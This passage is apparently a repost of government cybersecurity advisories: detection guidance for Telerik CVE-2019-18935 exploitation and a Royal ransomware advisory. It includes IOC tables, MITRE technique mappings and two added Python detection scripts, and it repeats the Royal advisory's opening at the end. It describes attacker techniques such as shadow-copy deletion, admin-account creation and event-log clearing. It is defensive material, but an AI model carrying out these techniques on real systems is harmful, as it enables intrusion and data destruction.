1309 | 3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.\n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n\n, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n","Binary":""}}
Authoring organizations recommend looking for the following key strings in the payload:
- w3wp.exe: the IIS worker process. This is the parent process that executes the code inside the malicious DLLs.
- System.Configuration.Install.AssemblyInstaller: the .NET type the exploit names in its serialized payload. Figure 1, taken from the creator's GitHub repo [7], shows the string in the exploit code.
As presented by Bishop Fox and confirmed during the authoring organizations' investigation of IIS server logs, an exception does not mean that the exploit failed; more likely it executed successfully.[3] The InvalidCastException is raised only after the JavaScriptSerializer has already instantiated the AssemblyInstaller object and set its Path property to the uploaded DLL, which is what loads the attacker's code; the failed cast to IAsyncUploadConfiguration happens afterwards and is the normal end of a successful payload. If a WerFault crash report was written, Windows Application event logs may contain evidence of this, even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.
| EventID | ExecutableInfo | MapDescription | Payload |
| --- | --- | --- | --- |
| 1000 | w3wp.exe \| 1664175639.65719.dll \| c:\windows\system32\inetsrv\w3wp.exe \| C:\Windows\Temp\1664175639.65719.dll | Application Error | {"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\windows\system32\inetsrv\w3wp.exe, C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}} |
| 1001 | w3wp.exe \| 1664175639.65719.dll \| C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe \| C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe \| C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe | Application Crash | {"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, \nC:\Windows\Temp\WERE3F6.tmp.appcompat.txt\nC:\Windows\Temp\WERE639.tmp.WERInternalMetadata.xml\nC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\memory.hdmp\nC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\triagedump.dmp, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}} |
The EventID field maps directly to the Windows event ID, which makes a simple first filter: Application log events 1000 (Application Error) and 1001 (Application Crash, the Windows Error Reporting event) whose faulting module or report path points at a DLL under C:\Windows\Temp with a Unix epoch-based name identify the malicious DLL even after the file itself has been deleted. In the rows above that module is 1664175639.65719.dll; its integer part decodes to 2022-09-26 07:00:39 UTC, the moment the exploit wrote the file. The exception code c00000fd in the same rows is STATUS_STACK_OVERFLOW, so in this case the dropped DLL crashed the IIS worker process, which is what produced the WER report.
The exact filter depends on how log analysis is performed. Where regular expressions are available, the example listed in Table 8 above can be reused to match the Unix epoch timestamp naming convention and assist in filtering.
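The filtering described above, as an added example that is not part of the advisory: a short Python script that walks records shaped like a KAPE/EvtxECmd JSON export (the EventId, MapDescription, and Payload columns used in the tables) and flags the three artifact types this section describes: EventID 1309 payloads carrying the Telerik AsyncUploadHandler cast failure together with the System.Configuration.Install.AssemblyInstaller gadget string, EventID 1000/1001 crash records whose faulting module is an epoch-named DLL (decoding the epoch to a UTC time), and, for the Additional Analysis step below, Security EventID 4688 records whose parent process is w3wp.exe. The sample records are constructed from the abbreviated rows above, not real victim data; the regular expression is this example's own (Table 8 is not reproduced on this page); and the C:\Windows\Temp drop location and the list-of-fields shape of the 4688 payload are assumptions.

```python
"""Hunt for CVE-2019-18935 artifacts in exported Windows event logs (added example)."""
import json
import re
from datetime import datetime, timezone

# Key strings the advisory lists for the EventID 1309 (ASP.NET event 3005) payload.
KEY_STRINGS_1309 = (
    "w3wp.exe",
    "System.Configuration.Install.AssemblyInstaller",
    "Telerik.Web.UI.AsyncUploadHandler",
)

# Epoch-named DLL such as 1664175639.65719.dll: ten digits of Unix time, a
# fractional part, then .dll. The C:\Windows\Temp\ prefix is optional so the bare
# module name in a 1000/1001 payload matches too (drop location is an assumption).
EPOCH_DLL = re.compile(r"(?i)(?:C:\\Windows\\Temp\\)?\b((\d{10})\.\d+\.dll)\b")


def epoch_dll_time(text):
    """Return (dll_name, UTC datetime) for the first epoch-named DLL in text, else None."""
    m = EPOCH_DLL.search(text)
    if not m:
        return None
    return m.group(1), datetime.fromtimestamp(int(m.group(2)), tz=timezone.utc)


def event_fields(payload):
    """Parse EventData.Data from an EvtxECmd-style JSON payload into a dict.

    WER (1000/1001) and ASP.NET (1309) events carry one comma-joined string;
    Security 4688 carries a list of {"@Name": ..., "#text": ...} items
    (that list shape is assumed for the constructed sample below).
    """
    try:
        data = json.loads(payload)["EventData"]["Data"]
    except (ValueError, KeyError, TypeError):
        return {"Data": str(payload)}          # not JSON: keep the raw text
    if isinstance(data, list):
        return {str(d.get("@Name", i)): str(d.get("#text", "")) for i, d in enumerate(data)}
    return {"Data": str(data)}


def classify(record):
    """Return a finding dict for a suspicious record, or None."""
    eid = int(record["EventId"])
    fields = event_fields(record.get("Payload", ""))
    text = " ".join(fields.values())
    if eid == 1309 and all(s in text for s in KEY_STRINGS_1309):
        # The cast fails only after the AssemblyInstaller gadget was deserialized,
        # i.e. after the DLL named in its Path property was already loaded.
        return {"event": eid, "reason": "Telerik AsyncUploadHandler cast failure after AssemblyInstaller gadget"}
    if eid in (1000, 1001):
        hit = epoch_dll_time(text)
        if hit:
            return {"event": eid, "dll": hit[0], "dll_named_utc": hit[1].isoformat()}
    if eid == 4688 and fields.get("ParentProcessName", "").lower().endswith("\\w3wp.exe"):
        return {"event": eid, "child": fields.get("NewProcessName", "")}
    return None


def hunt(records):
    """Classify every record; a real export would be loaded one JSON object per line."""
    return [f for f in map(classify, records) if f]


def _payload(data):
    return json.dumps({"EventData": {"Data": data, "Binary": ""}})


# Constructed records modelled on the advisory's abbreviated rows (not real victim data).
SAMPLE_RECORDS = [
    {"EventId": 1309, "MapDescription": "ASP.NET unhandled exception", "Payload": _payload(
        "3005, An unhandled exception has occurred w3wp.exe InvalidCastException, Unable to cast "
        "object of type 'System.Configuration.Install.AssemblyInstaller' to type "
        "'Telerik.Web.UI.IAsyncUploadConfiguration'.\n at Telerik.Web.UI.AsyncUploadHandler."
        "GetConfiguration(String rawData)")},
    {"EventId": 1309, "MapDescription": "ASP.NET unhandled exception", "Payload": _payload(
        "3005, An unhandled exception has occurred w3wp.exe NullReferenceException at "
        "MyApp.Default.Page_Load(Object sender, EventArgs e)")},            # ordinary app bug
    {"EventId": 1000, "MapDescription": "Application Error", "Payload": _payload(
        "w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, "
        "00000000000016f8, 1708, 01d8d0a5f84af443, c:\\windows\\system32\\inetsrv\\w3wp.exe, "
        "C:\\Windows\\Temp\\1664175639.65719.dll")},
    {"EventId": 1000, "MapDescription": "Application Error", "Payload": _payload(
        "notepad.exe, 10.0.19041.1, 0, ntdll.dll, 10.0.19041.1, 0, c0000005, 0, 0, 0, "
        "C:\\Windows\\System32\\notepad.exe, C:\\Windows\\System32\\ntdll.dll")},   # benign crash
    {"EventId": 4688, "MapDescription": "New process created", "Payload": _payload([
        {"@Name": "NewProcessName", "#text": "C:\\Windows\\System32\\cmd.exe"},
        {"@Name": "ParentProcessName", "#text": "C:\\Windows\\System32\\inetsrv\\w3wp.exe"}])},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_RECORDS):
        print(finding)
```

The 1309 check requires all three strings rather than any one of them, because w3wp.exe alone appears in every ASP.NET exception (the second sample record is a routine application bug and is ignored); the 4688 check keys on the parent process rather than the child's name because the dropped DLL can spawn anything.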
Additional Analysis
When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur, as the malicious files could do nearly anything. Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:
- Search for w3wp.exe in Windows security event logs (e.g., Windows EventID 4688, New Process Created). The malicious DLL runs inside the IIS worker process, so any process created with w3wp.exe as its parent is a candidate for having been spawned by the attacker's code and should be examined.
Trellix XDR Platform Searching
If Trellix XDR Platform is deployed in the environment and a standard HX triage audit is completed soon after the suspected exploitation of CVE-2019-18935, the organization can search for file write events from known web server processes. This will identify the executables written by the web server process: MZ is the two-byte DOS header that begins every PE file, so matching on the first bytes of the written file rather than on its extension catches DLLs dropped under arbitrary names. CISA and authoring organizations specifically recommend searching for the following field/value pair:

| Field | Value Begins With |
| --- | --- |
| TextAtLowestOffset | MZ |
MITIGATIONS
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Manage Vulnerabilities and Configurations
Segment Networks Based on Function
Other Best Practice Mitigation Recommendations
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
UNIX Timestamp Converter
REFERENCES
[1] Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)
[2] ACSC Advisory 2020-004
[3] Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI
[4] Volexity Threat Research: XE Group
[5] GitHub: Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935
ACKNOWLEDGEMENTS
Google’s Threat Analysis Group (TAG) contributed to this CSA.
Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we’d welcome your feedback.
Source of the article: us-cert.gov
#StopRansomware: Royal Ransomware
SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used "Zeon" as a loader. After gaining access to victims' networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Health (HPH), and Education.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which speeds up encryption and helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics, in which they threaten to publicly release the data they exfiltrated if the victim does not pay the ransom.
Initial Access
Royal actors gain initial access to victim networks in a number of ways, including phishing emails carrying malicious PDF attachments [T1566.001], malvertising links delivered via email or public-facing sites [T1566.002], exploitation of public-facing applications [T1190], and abuse of remote monitoring and management (RMM) software [T1133] (see the MITRE ATT&CK Techniques tables below).
Command and Control
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim's network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel, an open-source tunneling tool that carries TCP/UDP traffic over HTTP and secures it with SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.
Lateral Movement and Persistence
Royal actors often use RDP to move laterally across the network [T1021.001]. The Microsoft Sysinternals tool PsExec has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim's network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor disabled antivirus protection [T1562.001] by modifying Group Policy Objects [T1484.001].
Exfiltration
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors delete volume shadow copies with vssadmin.exe to prevent system recovery.[1]
FBI has found numerous batch (.bat) files on impacted systems, which are typically transferred as an encrypted 7zip file. The batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion, including the Application, System, and Security event logs [T1070.001]. Malicious files have been found in victim networks in the following directories:
C:\Temp
C:\Users\[username]\AppData\Roaming
C:\Users
C:\ProgramData
Indicators of Compromise (IOC)
See Tables 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old, and some fall in address space operated by large hosting or CDN providers (172.64.80[.]1, for example, is in a Cloudflare range), so blocking them outright can disrupt legitimate traffic. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.

| IOC | Description |
| --- | --- |
| .royal | Encrypted file extension |
| README.TXT | Ransom note |

| Malicious IP | Last Activity |
| --- | --- |
| 102.157.44[.]105 | November 2022 |
| 105.158.118[.]241 | November 2022 |
| 105.69.155[.]85 | November 2022 |
| 113.169.187[.]159 | November 2022 |
| 134.35.9[.]209 | November 2022 |
| 139.195.43[.]166 | November 2022 |
| 139.60.161[.]213 | November 2022 |
| 148.213.109[.]165 | November 2022 |
| 163.182.177[.]80 | November 2022 |
| 181.141.3[.]126 | November 2022 |
| 181.164.194[.]228 | November 2022 |
| 185.143.223[.]69 | November 2022 |
| 186.64.67[.]6 | November 2022 |
| 186.86.212[.]138 | November 2022 |
| 190.193.180[.]228 | November 2022 |
| 196.70.77[.]11 | November 2022 |
| 197.11.134[.]255 | November 2022 |
| 197.158.89[.]85 | November 2022 |
| 197.204.247[.]7 | November 2022 |
| 197.207.181[.]147 | November 2022 |
| 197.207.218[.]27 | November 2022 |
| 197.94.67[.]207 | November 2022 |
| 23.111.114[.]52 | November 2022 |
| 41.100.55[.]97 | November 2022 |
| 41.107.77[.]67 | November 2022 |
| 41.109.11[.]80 | November 2022 |
| 41.251.121[.]35 | November 2022 |
| 41.97.65[.]51 | November 2022 |
| 42.189.12[.]36 | November 2022 |
| 45.227.251[.]167 | November 2022 |
| 5.44.42[.]20 | November 2022 |
| 61.166.221[.]46 | November 2022 |
| 68.83.169[.]91 | November 2022 |
| 81.184.181[.]215 | November 2022 |
| 82.12.196[.]197 | November 2022 |
| 98.143.70[.]147 | November 2022 |
| 140.82.48[.]158 | December 2022 |
| 147.135.36[.]162 | December 2022 |
| 147.135.11[.]223 | December 2022 |
| 152.89.247[.]50 | December 2022 |
| 172.64.80[.]1 | December 2022 |
| 179.43.167[.]10 | December 2022 |
| 185.7.214[.]218 | December 2022 |
| 193.149.176[.]157 | December 2022 |
| 193.235.146[.]104 | December 2022 |
| 209.141.36[.]116 | December 2022 |
| 45.61.136[.]47 | December 2022 |
| 45.8.158[.]104 | December 2022 |
| 5.181.234[.]58 | December 2022 |
| 5.188.86[.]195 | December 2022 |
| 77.73.133[.]84 | December 2022 |
| 89.108.65[.]136 | December 2022 |
| 94.232.41[.]105 | December 2022 |
| 47.87.229[.]39 | January 2023 |

| Malicious Domain | Last Observed |
| --- | --- |
| ciborkumari[.]xyz | October 2022 |
| sombrat[.]com | October 2022 |
| gororama[.]com | November 2022 |
| softeruplive[.]com | November 2022 |
| altocloudzone[.]live | December 2022 |
| ciborkumari[.]xyz | December 2022 |
| myappearinc[.]com | December 2022 |
| parkerpublic[.]com | December 2022 |
| pastebin.mozilla[.]org/Z54Vudf9/raw | December 2022 |
| tumbleproperty[.]com | December 2022 |
| myappearinc[.]com/acquire/draft/c7lh0s5jv | January 2023 |

| Tool | SHA256 |
| --- | --- |
| AV tamper | 8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375 |
| TCP/UDP Tunnel over HTTP (Chisel) | 8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451 |
| Ursnif/Gozi | be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1 |
| Exfil | B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20 |
| Remote Access (AnyDesk) | 4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7 |
| PowerShell Toolkit Downloader | 4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce |
| PsExec (Microsoft Sysinternals) | 08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c |
| Keep Host Unlocked (Don't Sleep) | f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee |
| Ransomware Executable | d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681 |
| Windows Command Line (NirCmd) | 216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5 |
| System Management (NSudo) | 19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618 |

Batch Scripts
Note: the hash column mixes two digest lengths; the 40-character values are SHA-1 and the 64-character values are SHA-256, so match each against the matching hash type.

| Filename | Hash Value | Hash Type (by length) |
| --- | --- | --- |
| 2.bat | 585b05b290d241a249af93b1896a9474128da969 | SHA-1 |
| 3.bat | 41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d | SHA-1 |
| 4.bat | a84ed0f3c46b01d66510ccc9b1fc1e07af005c60 | SHA-1 |
| 8.bat | c96154690f60a8e1f2271242e458029014ffe30a | SHA-1 |
| kl.bat | 65dc04f3f75deb3b287cca3138d9d0ec36b8bea0 | SHA-1 |
| gp.bat | 82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58 | SHA-256 |
| r.bat | 74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c | SHA-256 |
| runanddelete.bat | 342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE | SHA-256 |
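Loading the tables above into a matcher, as an added example that is not part of the advisory. Three things about the lists trip up a naive copy into a blocklist: the values are printed defanged with [.], two of the "domain" entries are really URLs on hosts that also serve legitimate content (pastebin.mozilla[.]org is Mozilla's paste service), and the batch-script hashes mix SHA-1 and SHA-256. The script below refangs each value, classifies it by shape, matches hashes case-insensitively, matches domains on the exact name or any subdomain, and matches URL indicators only when host and path both agree, so the bare host of a URL indicator is not flagged. It loads only a subset of the tables, and the events it scans are constructed telemetry with an invented shape, not data from the advisory.

```python
"""Match Royal ransomware IOCs, as printed in the advisory, against telemetry (added example)."""
import re

# Indicators copied from the tables above exactly as printed (defanged); a subset only.
INDICATORS = [
    ("sombrat[.]com", "malicious domain, last observed October 2022"),
    ("altocloudzone[.]live", "malicious domain, last observed December 2022"),
    ("pastebin.mozilla[.]org/Z54Vudf9/raw", "malicious URL, last observed December 2022"),
    ("94.232.41[.]105", "tool repository, December 2022"),
    ("47.87.229[.]39", "malicious IP, last active January 2023"),
    ("8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375", "AV tamper tool (SHA-256)"),
    ("585b05b290d241a249af93b1896a9474128da969", "2.bat (SHA-1)"),
]

HEX = re.compile(r"[0-9a-fA-F]+")
IPV4 = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")


def refang(value):
    """Undo the [.] defanging used in the advisory so values compare with real logs."""
    return value.strip().replace("[.]", ".")


def classify(value):
    """Map a printed indicator to (kind, normalised key) by its shape."""
    v = refang(value)
    if HEX.fullmatch(v) and len(v) in (32, 40, 64):      # MD5 / SHA-1 / SHA-256 by length
        return "hash", v.lower()
    if IPV4.fullmatch(v):
        return "ip", v
    if "/" in v:                                          # host plus path: a URL, not a domain
        host, _, path = v.partition("/")
        return "url", (host.lower(), "/" + path)
    return "domain", v.lower().rstrip(".")


class IocSet:
    def __init__(self, indicators):
        self.by_kind = {"hash": {}, "ip": {}, "domain": {}, "url": {}}
        for value, description in indicators:
            kind, key = classify(value)
            self.by_kind[kind][key] = description

    def match_hash(self, digest):
        return self.by_kind["hash"].get(digest.strip().lower())

    def match_ip(self, ip):
        return self.by_kind["ip"].get(ip.strip())

    def match_domain(self, name):
        """Exact or subdomain match; a URL-only indicator never taints its bare host."""
        name = name.lower().rstrip(".")
        for domain, description in self.by_kind["domain"].items():
            if name == domain or name.endswith("." + domain):
                return description
        return None

    def match_url(self, host, path):
        return self.by_kind["url"].get((host.lower().rstrip("."), path))


def scan(iocs, events):
    """Return (event id, description) for every constructed event that hits an indicator."""
    hits = []
    for ev in events:
        kind = ev["kind"]
        if kind == "dns":
            description = iocs.match_domain(ev["query"])
        elif kind == "conn":
            description = iocs.match_ip(ev["dst"])
        elif kind == "http":
            description = iocs.match_url(ev["host"], ev["path"])
        elif kind == "file":
            description = iocs.match_hash(ev["hash"])
        else:
            description = None
        if description:
            hits.append((ev["id"], description))
    return hits


# Constructed telemetry (not from the advisory): DNS queries, connections, HTTP requests, file hashes.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "dns", "query": "cdn.sombrat.com"},                 # subdomain of an IOC
    {"id": 2, "kind": "dns", "query": "pastebin.mozilla.org"},            # bare host of a URL IOC: benign
    {"id": 3, "kind": "http", "host": "pastebin.mozilla.org", "path": "/Z54Vudf9/raw"},
    {"id": 4, "kind": "conn", "dst": "94.232.41.105"},
    {"id": 5, "kind": "conn", "dst": "10.0.0.12"},
    {"id": 6, "kind": "file", "hash": "585B05B290D241A249AF93B1896A9474128DA969"},  # upper-cased SHA-1
    {"id": 7, "kind": "file", "hash": "8a983042278bc5897dbcdd54d1d7e3143f8b7ead553b5a4713e30deffda16375"},
]

if __name__ == "__main__":
    for hit in scan(IocSet(INDICATORS), SAMPLE_EVENTS):
        print(hit)
```

Event 2 is deliberately left unmatched: blocking or alerting on pastebin.mozilla.org because one paste on it was malicious is exactly the over-match the advisory's vetting note warns about, and the same reasoning applies to the IP entries that sit in shared hosting or CDN space.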
MITRE ATT&CK TECHNIQUES
See Table 3 for all referenced threat actor tactics and techniques included in this advisory.

Initial Access

| Technique Title | ID | Use |
| --- | --- | --- |
| Exploit Public-Facing Application | T1190 | The actors gain initial access through public-facing applications. |
| Phishing: Spearphishing Attachment | T1566.001 | The actors gain initial access through malicious PDF attachments sent via email. |
| Phishing: Spearphishing Link | T1566.002 | The actors gain initial access using malvertising links via emails and public-facing sites. |
| External Remote Services | T1133 | The actors gain initial access through a variety of RMM software. |

Command and Control

| Technique Title | ID | Use |
| --- | --- | --- |
| Ingress Tool Transfer | T1105 | The actors used C2 infrastructure to download multiple tools. |
| Protocol Tunneling | T1572 | The actors used an encrypted SSH tunnel (Chisel) to communicate with C2 infrastructure. |

Privilege Escalation

| Technique Title | ID | Use |
| --- | --- | --- |
| Valid Accounts: Domain Accounts | T1078.002 | The actors used batch files, delivered as an encrypted 7zip archive, to create new admin user accounts. |

Defense Evasion

| Technique Title | ID | Use |
| --- | --- | --- |
| Impair Defenses: Disable or Modify Tools | T1562.001 | The actors disabled antivirus protection. |
| Domain Policy Modification: Group Policy Modification | T1484.001 | The actors modified Group Policy Objects to disable antivirus protection. |
| Indicator Removal: Clear Windows Event Logs | T1070.001 | The actors deleted shadow copies and the Application, System, and Security event logs after exfiltration. |

Lateral Movement

| Technique Title | ID | Use |
| --- | --- | --- |
| Remote Services: Remote Desktop Protocol | T1021.001 | The actors used valid accounts to move laterally over RDP, including to the domain controller. |

Collection

| Technique Title | ID | Use |
| --- | --- | --- |
| Automated Collection | T1119 | The actors used registry keys to auto-extract and collect files. |

Impact

| Technique Title | ID | Use |
| --- | --- | --- |
| Data Encrypted for Impact | T1486 | The actors encrypted victim data, after first checking which files were in use or blocked by other applications. |
MITIGATIONS
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
RESOURCES
REPORTING
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
REFERENCES
[1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com)
[2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads – Microsoft Security Blog
[3] 2023-01: ACSC Ransomware Profile – Royal | Cyber.gov.au
ACKNOWLEDGEMENTS
Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.
Source of the article: us-cert.gov
#StopRansomware: Royal Ransomware
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
